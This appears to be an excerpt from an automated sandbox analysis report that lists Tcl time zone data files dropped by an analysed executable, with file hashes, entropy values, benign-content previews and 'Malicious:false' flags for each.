                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Matamoros) {.. {-9223372036854775808 -23400 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2067
                                                                                                                                                                                                                              Entropy (8bit):3.990817847620547
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5GtXed9WUQwuz/V/NF01YmM/parZ375+XiB+:5sNUIdFS1YrpaV5+yB+
                                                                                                                                                                                                                              MD5:43467194416FCF6F0D67AD2456D78646
                                                                                                                                                                                                                              SHA1:1FDF02EF7354D9DB71F545D32AE52D018E99D801
                                                                                                                                                                                                                              SHA-256:8140084EA9D6A478C34A114D9E216DC05450ECBE4809B2CDA194B40452E2AA0F
                                                                                                                                                                                                                              SHA-512:EB5CD3E95779391F096EE9A7B16920C6C9E8A90F38C7A3CBE2B0E123D088A127C5BBE21F5883DCDAD4FBB2410ED052EDE3D4F1E260483D97FEBB7BA7022874C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mazatlan) {.. {-9223372036854775808 -25540 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -2520
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.812188311941308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MeHAIgp/MSvYovN/290zpH+90/MX:MByMY/M/p/MSA6t290zpe90/MX
                                                                                                                                                                                                                              MD5:2A3BFEEFBB684FB3B420A6B53B588BDC
                                                                                                                                                                                                                              SHA1:CC5C0BB90D847CCBB45688A8DA460AD575D64617
                                                                                                                                                                                                                              SHA-256:D6B308A1619F2DE450DACBFEF0E11B237DF7375A80C90899DD02B827688CB4B8
                                                                                                                                                                                                                              SHA-512:4A35C80D3454E039383FFEB06DC84933B3201BE2487C42A448AF3DA5ABAEEB9882263C011CDD3194E121EC1C31FC80120BF7829F280A79996E376CFA828EE215
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Mendoza)]} {.. LoadTimeZoneFile America/Argentina/Mendoza..}..set TZData(:America/Mendoza) $TZData(:America/Argentina/Mendoza)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8410
                                                                                                                                                                                                                              Entropy (8bit):3.8311875423131534
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:6quShLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:6lSUqtfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:C74D31382279219F805D2B138C58FBF7
                                                                                                                                                                                                                              SHA1:06E2FED0A3BDF62F3D390A4054B6A2D7C1863DD3
                                                                                                                                                                                                                              SHA-256:B0863F8B66F0848020651B69E7997307D62209259AE653FDC1A0FAFC8E793068
                                                                                                                                                                                                                              SHA-512:7B42CBDC119651E2B2EE8B8F934801D3147A8B72EE060A0D0EA1C0C12CA9ABD03F1A102A85BF8E7424B45620151CE107D16A9173F4AA7597EDB3109840C1B2AE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Menominee) {.. {-9223372036854775808 -21027 0 LMT}.. {-2659759773 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-116438400 -18000 1 CDT}.. {-100112400 -21600 0 CST}.. {-21484800 -18000 0 EST}.. {104914800 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000 1 CDT}.. {247042800 -21600 0 CST}.. {262771200 -18000 1 CDT}.. {278492400 -21600 0 CST}.. {294220800 -18000 1 CDT}.. {309942000 -2160
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1877
                                                                                                                                                                                                                              Entropy (8bit):3.9636871490767147
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5bu36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:1qehpYtj
                                                                                                                                                                                                                              MD5:34909341A29FF048D83B707D12A728A5
                                                                                                                                                                                                                              SHA1:A4D4EC31681DB5F9DA899E20C6789D10827E6D86
                                                                                                                                                                                                                              SHA-256:ADE65ADDEEA027D1BE70DC7C12513B61FDF36289021E66982D527C7FEE2A2D19
                                                                                                                                                                                                                              SHA-512:57EED40425680CE2C05D961D3F21EE2E0D204E1FD6D3DB5F1EF7AC349AA269F9397D4E2121BD13BC3DE34205564FBE009CEEB5ADE4052EA742CBA15A91F5822B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Merida) {.. {-9223372036854775808 -21508 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {407653200 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6705
                                                                                                                                                                                                                              Entropy (8bit):3.985641709481311
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4DCG0haiaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:42G0IiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:4999FE49C1640402CB432BC1EB667479
                                                                                                                                                                                                                              SHA1:2ED0044927A66856090793ED6E5FF634617C8C40
                                                                                                                                                                                                                              SHA-256:2574831391092AD44D7B2806EEF30D59CE3BAE872111917DD39EC51EFDD62E5F
                                                                                                                                                                                                                              SHA-512:39DE1D24037F3FFA3101BBAA885939074E596479F68013CDA9CE53A061EA704F63FB55C15B68B66B0E29E3F07ADC0BDC2D78A2D289277E75D2EF95F54988DB74
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Metlakatla) {.. {-9223372036854775808 54822 0 LMT}.. {-3225223727 -31578 0 LMT}.. {-2188955622 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {30
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2261
                                                                                                                                                                                                                              Entropy (8bit):3.9546083289866267
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5CBUBUI+n36fELf5On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:EB7qehpYtj
                                                                                                                                                                                                                              MD5:7A67EA7FF5AC0E9B088298007A9370F4
                                                                                                                                                                                                                              SHA1:531583F67E0C6ABA95B5A664A555BF40BF743CE8
                                                                                                                                                                                                                              SHA-256:E83DB749E6AA87FD56829C2810D0F93A4194E3EE2CB0BDC12114B1EF55E92E96
                                                                                                                                                                                                                              SHA-512:2C9035B415E36A769782FCFA15D79E5FEACA232439D1442407C8CD8C144EE9991030D9D58D2AD54CF6C0840BF78C81921B82BECBC74ABBD0DAC627F77772F52F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mexico_City) {.. {-9223372036854775808 -23796 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-975261600 -18000 1 CDT}.. {-963169200 -21600 0 CST}.. {-917114400 -18000 1 CDT}.. {-907354800 -21600 0 CST}.. {-821901600 -18000 1 CWT}.. {-810068400 -21600 0 CST}.. {-627501600 -18000 1 CDT}.. {-612990000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001836800 -21600 0 CST}.. {1014184800 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {10357020
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7080
                                                                                                                                                                                                                              Entropy (8bit):3.5379714312244217
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:2UViR+iORv7bw1aW5AnMyxH5e+fHbxMfOp6D7bF8qMmqyiqV1mjZe7JhlgXY7FWN:02l5qJZS
                                                                                                                                                                                                                              MD5:C68889AA813C399939FCFA54E9CE0DFB
                                                                                                                                                                                                                              SHA1:F3D58D7BEFF2D1CB94FECE00C31FEF5BDF58C231
                                                                                                                                                                                                                              SHA-256:1B131AC968F95652667BD7EB1F6D667C8F679B31270D82B4B4271E787386CCCA
                                                                                                                                                                                                                              SHA-512:EBAF8210919E34668E9DDFCB546E5A62F35954957AAE956B6302BF296C7D4CF51E1B10FB13217CB3EEB430DAC246217EB4E9250CB4109C95D8A4367457D02771
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Miquelon) {.. {-9223372036854775808 -13480 0 LMT}.. {-1850328920 -14400 0 AST}.. {326001600 -10800 0 -03}.. {536468400 -10800 0 -02}.. {544597200 -7200 1 -02}.. {562132800 -10800 0 -02}.. {576046800 -7200 1 -02}.. {594187200 -10800 0 -02}.. {607496400 -7200 1 -02}.. {625636800 -10800 0 -02}.. {638946000 -7200 1 -02}.. {657086400 -10800 0 -02}.. {671000400 -7200 1 -02}.. {688536000 -10800 0 -02}.. {702450000 -7200 1 -02}.. {719985600 -10800 0 -02}.. {733899600 -7200 1 -02}.. {752040000 -10800 0 -02}.. {765349200 -7200 1 -02}.. {783489600 -10800 0 -02}.. {796798800 -7200 1 -02}.. {814939200 -10800 0 -02}.. {828853200 -7200 1 -02}.. {846388800 -10800 0 -02}.. {860302800 -7200 1 -02}.. {877838400 -10800 0 -02}.. {891752400 -7200 1 -02}.. {909288000 -10800 0 -02}.. {923202000 -7200 1 -02}.. {941342400 -10800 0 -02}.. {954651600 -7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10507
                                                                                                                                                                                                                              Entropy (8bit):3.8204583916930557
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:X9+FPHyXFRsivcQYM+T7Z/xVQzxmtBWIXrObx29x8sLxcGMe++wzlrfFjxKvnpNM:gF6L0d0F2TzNc/1cYUH+CC
                                                                                                                                                                                                                              MD5:80B88F57B837CD2478815796618A6AC6
                                                                                                                                                                                                                              SHA1:CC2BE0213E9F0D3B307A8311D7A1013582E8A338
                                                                                                                                                                                                                              SHA-256:D977D045DE5CDAEB41189B91963E03EF845CA4B45E496649B4CB541EE1B5DD22
                                                                                                                                                                                                                              SHA-512:9410CBD706CAABFFF88DFF75235597D844B45A061EBD796F6708D7CEAB680273571A17935B7CCFC7C466ABF293C286D0886F47880E692F74C4E8BFB41729C73C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Moncton) {.. {-9223372036854775808 -15548 0 LMT}.. {-2715882052 -18000 0 EST}.. {-2131642800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1167595200 -14400 0 AST}.. {-1153681200 -10800 1 ADT}.. {-1145822400 -14400 0 AST}.. {-1122231600 -10800 1 ADT}.. {-1114372800 -14400 0 AST}.. {-1090782000 -10800 1 ADT}.. {-1082923200 -14400 0 AST}.. {-1059332400 -10800 1 ADT}.. {-1051473600 -14400 0 AST}.. {-1027882800 -10800 1 ADT}.. {-1020024000 -14400 0 AST}.. {-996433200 -10800 1 ADT}.. {-988574400 -14400 0 AST}.. {-965674800 -10800 1 ADT}.. {-955396800 -14400 0 AST}.. {-934743600 -10800 1 ADT}.. {-923947200 -14400 0 AST}.. {-904503600 -10800 1 ADT}.. {-891892800 -14400 0 AST}.. {-883598400 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1940
                                                                                                                                                                                                                              Entropy (8bit):3.9628147491173964
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5JZKy36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:XwDqehpYtj
                                                                                                                                                                                                                              MD5:4AE2B33D9DACE0E582FA456B361C50B7
                                                                                                                                                                                                                              SHA1:5D62287F072F3687EF130BB1A9DD97BB2ABCF91C
                                                                                                                                                                                                                              SHA-256:F5A66A403BF40BE7EAB188F3CEC8D7DB700F60084F7B856AB87E0AA4A0F2C0B6
                                                                                                                                                                                                                              SHA-512:39BE803FD47709A1120FC8E09DB9B294DE41F69C7DD86AAB03AD8D0878B160B21D82B16398125559B792DAE99D5D917AE466C536001FEC1E618B68ACA9A80322
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Monterrey) {.. {-9223372036854775808 -24076 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2936
                                                                                                                                                                                                                              Entropy (8bit):3.6410670126139046
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5JgQkS4SaEcSyS0sZSUS2kSVSXSulSASX5kAXJMsCXrUari3akaWCa3M+lafpI6L:X5kH4c9GT0E01jm5keJMRXrUEi3akaWO
                                                                                                                                                                                                                              MD5:D78DEBC7C0B15B31635DDC34C49248BC
                                                                                                                                                                                                                              SHA1:DB2FF76DB3A79BE52E2DFD4C7B8B6592946772F9
                                                                                                                                                                                                                              SHA-256:214F97A3BCB2378CCE23D280EA6A3B691604F82E383628F666BE585BB8494932
                                                                                                                                                                                                                              SHA-512:E5FCD0B54F61910E70B1D0EE9911C5B4AFF850F16B651A01D69A63A97880913B0BAB99B0D864C4E613594734FA72CCA0E9607B1ADB6E75957C790990114FD0A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Montevideo) {.. {-9223372036854775808 -13491 0 LMT}.. {-1942690509 -13491 0 MMT}.. {-1567455309 -14400 0 -04}.. {-1459627200 -10800 0 -0330}.. {-1443819600 -12600 0 -0330}.. {-1428006600 -10800 1 -0330}.. {-1412283600 -12600 0 -0330}.. {-1396470600 -10800 1 -0330}.. {-1380747600 -12600 0 -0330}.. {-1141590600 -10800 1 -0330}.. {-1128286800 -12600 0 -0330}.. {-1110141000 -10800 1 -0330}.. {-1096837200 -12600 0 -0330}.. {-1078691400 -10800 1 -0330}.. {-1065387600 -12600 0 -0330}.. {-1047241800 -10800 1 -0330}.. {-1033938000 -12600 0 -0330}.. {-1015187400 -10800 1 -0330}.. {-1002488400 -12600 0 -0330}.. {-983737800 -10800 1 -0330}.. {-971038800 -12600 0 -0330}.. {-954707400 -10800 1 -0330}.. {-938984400 -12600 0 -0330}.. {-920838600 -10800 1 -0330}.. {-907534800 -12600 0 -0330}.. {-896819400 -10800 1 -0330}.. {-853621200 -9000 0 -03}.. {-84
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.748877320903638
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEzQ21h4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/290zQgp
                                                                                                                                                                                                                              MD5:9130CD86BD6417DB877BF9D8F3080CE1
                                                                                                                                                                                                                              SHA1:76C37982C37FE54ED539AC14B5A513817E42937C
                                                                                                                                                                                                                              SHA-256:97F48948EF5108FE1F42D548EA47C88D4B51BF1896EE92634C7ED55555B06DBD
                                                                                                                                                                                                                              SHA-512:EE036350AF95414392BD93DFF528F67D9A93EB192A30056ECBC3D2396AB4B2938B3C096C3EC2BC739294D4C4B7261C427B0AAEB9559F5381CB7F375892781820
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Montreal) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.878534808314885
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zQ1HK90ppv:MByMYbpwt290zQ490b
                                                                                                                                                                                                                              MD5:CB5988A2508285B42C2BD487B8F9D6E1
                                                                                                                                                                                                                              SHA1:EAD740A566245B682CE5E284D389DFAE66DF05D9
                                                                                                                                                                                                                              SHA-256:6C3EE46983A3DAA91C9ADF4B18D6B4B80F1505B0057569B66D5B465D4C09B9C1
                                                                                                                                                                                                                              SHA-512:48796213A67F0E3BC56B54CE4D8BE098E74BA5808C9A1082D9381CB729ADFA2ACB9CE9E39A3244B3901405761C97AEE28D44C3BF7239ECC71175C62E152029C4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Montserrat) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.785765433607229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwEzEeIAcGu:SlSWB9vsM3y7RQtHAIgpRQPN/290xzEf
                                                                                                                                                                                                                              MD5:F7DAD684104D917E0F29F6951EA627AC
                                                                                                                                                                                                                              SHA1:E57B5CA730D90C5865CF32FEC4872F71E033D21C
                                                                                                                                                                                                                              SHA-256:A889810B8BB42CD206D8F8961164AD03CCFBB1924D583075489F78AFA10EAF67
                                                                                                                                                                                                                              SHA-512:8284F2A357A32B2F5A211904F65E3B5C37B77C9BF38C85DFA0A95A73457F3076EC12F09BC767B4D0B8FC86BF69D01A17A7BF685BAB72F3E519A397D050DA0C3B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nassau) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11373
                                                                                                                                                                                                                              Entropy (8bit):3.8110553140357086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:HeohzORhK1a8phYvNoStCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:+uORhK1a8phYloSItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:385C3BDD3E41E5E75CEF0658322B5CDE
                                                                                                                                                                                                                              SHA1:0334C21C8316ED2EE16FC98B1E8867D5E0916C00
                                                                                                                                                                                                                              SHA-256:7BA7DA179AA7DF26AC25E7ACCD9BD83784174445285A0D9CCBD7D6A9AA34F4BC
                                                                                                                                                                                                                              SHA-512:764B680FB8414B5AC8FB110247C19B1004A4453DD2BAC94BF3CFD80281FF3679A5B1D212238509165E022269503ED14A54B0EF73AF7014344752E6A627657D1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
